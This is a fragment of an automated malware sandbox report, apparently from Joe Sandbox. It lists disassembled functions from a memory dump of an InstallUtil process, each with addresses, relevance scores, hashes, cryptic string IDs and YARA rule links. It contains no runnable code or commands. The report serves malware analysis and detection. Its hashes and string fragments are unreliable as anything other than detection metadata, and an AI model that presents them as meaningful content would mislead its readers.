                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: {\-$"{\-$>{\-$Z{\-$x{\-$x\-
                                • API String ID: 0-3744525720
                                • Opcode ID: d569bfcfb163ddd6eeec363fc446aeb68093960a339e1b5a5cd0c196e85bd799
                                • Instruction ID: 2b9bf5d7db2c05dd2cae62644ac647a72bf425c99824be59aeeb58329fb56720
                                • Opcode Fuzzy Hash: d569bfcfb163ddd6eeec363fc446aeb68093960a339e1b5a5cd0c196e85bd799
                                • Instruction Fuzzy Hash: 27517435F112155BDB58FBB8D4A07EE76F7FBC8650F10842AE506EB780EE609C018791
                                Function 06A3CB28 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ]\-$6]\-$R]\-$a]\-$q]\-
                                • API String ID: 0-1053814404
                                • Opcode ID: 6b3fc2c6f07f94c1e043ca4d40ede2ca7ae441dabd638e2bab9a368fecdb66d5
                                • Instruction ID: c82c4a7283deab5592f723e7c19405ff5dddfabafd1d9273882c730911e47bed
                                • Opcode Fuzzy Hash: 6b3fc2c6f07f94c1e043ca4d40ede2ca7ae441dabd638e2bab9a368fecdb66d5
                                • Instruction Fuzzy Hash: 65619234B002159FDB58EBB8D864AAEB7F6FF89650F148569E406EF391EA70DC00C791
                                Function 06A3B210 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,s\-$Nq\-$Sq\-$hq\-$q\-
                                • API String ID: 0-1214977662
                                • Opcode ID: 5ec8c5527fec71b07a69eaca34225c42fed74033f61659e788c664e5e5951ea2
                                • Instruction ID: 6372f5633de25fe159f4c2eb78d8bfed7e11977160081f1c68434647c7dcb720
                                • Opcode Fuzzy Hash: 5ec8c5527fec71b07a69eaca34225c42fed74033f61659e788c664e5e5951ea2
                                • Instruction Fuzzy Hash: 64712A74A013198FDB58EBA8C5646AEB7F6FF94340F208429E406EF794DB309C45CBA1
                                Function 06A3C6E0 Relevance: 5.3, Strings: 4, Instructions: 298COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: =\\-$n\\-$y\\-$]\-
                                • API String ID: 0-143182104
                                • Opcode ID: 1ff685fad1f3be02f542f9c3a31b1f1109234846b63e2f14c66b3f79bb30acdb
                                • Instruction ID: 88c8bf9933cc42e5d8c13bab936bfb9802e667f7b546b69b125367ca24c0daf8
                                • Opcode Fuzzy Hash: 1ff685fad1f3be02f542f9c3a31b1f1109234846b63e2f14c66b3f79bb30acdb
                                • Instruction Fuzzy Hash: 99B11D34E012198BDB98EBB8C8946AEB7F2BF84354F248429D406EF355DB75DC42CB91
                                Function 06A3C6D0 Relevance: 5.3, Strings: 4, Instructions: 291COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: =\\-$n\\-$y\\-$]\-
                                • API String ID: 0-143182104
                                • Opcode ID: a1b2771a7b44f0139e260d8b243bdc3b4ed514dccaf008b44b24826beda8264a
                                • Instruction ID: 64e25b444f90f2ca5ca043400bec6a89ed03378f62be4c0ad9b586990f8af589
                                • Opcode Fuzzy Hash: a1b2771a7b44f0139e260d8b243bdc3b4ed514dccaf008b44b24826beda8264a
                                • Instruction Fuzzy Hash: 9DB16F34F012158BDB98EBB4C8906AEB7F2AF84354F248469E406EF355EB75DC42CB91
                                Function 06A37D29 Relevance: 5.1, Strings: 4, Instructions: 131COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ^\-$/^\-$0^\-$t^\-
                                • API String ID: 0-1740364902
                                • Opcode ID: 3955b5bccb90cd84a30d592ab9d7ee776f17d6661c922f6dc6409fce99aae6f5
                                • Instruction ID: 1be93b9a77b1da7918d2f43a2acff5655d705e030c470fb74052d8df53083411
                                • Opcode Fuzzy Hash: 3955b5bccb90cd84a30d592ab9d7ee776f17d6661c922f6dc6409fce99aae6f5
                                • Instruction Fuzzy Hash: 7E41E3317001159BDB89F779C8647AEB6E7AFC5250F144029E50ACF381EE34DD418BE5
                                Function 06A3F159 Relevance: 5.1, Strings: 4, Instructions: 130COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: OK\-$PK\-$bK\-$tK\-
                                • API String ID: 0-3114378581
                                • Opcode ID: 958bd431893716b58d5dc08d9089fb6084313b5be58d30f25a225f2efa88dc71
                                • Instruction ID: fa0c79e87ac250b11ea1ac223ea6cf1b0666728d7c51d72440920f5d23c2e2b3
                                • Opcode Fuzzy Hash: 958bd431893716b58d5dc08d9089fb6084313b5be58d30f25a225f2efa88dc71
                                • Instruction Fuzzy Hash: A7419034F11219DFEB68EBB4D5647AEB6F6AF88640F108129E406EB254DF749C40CBA1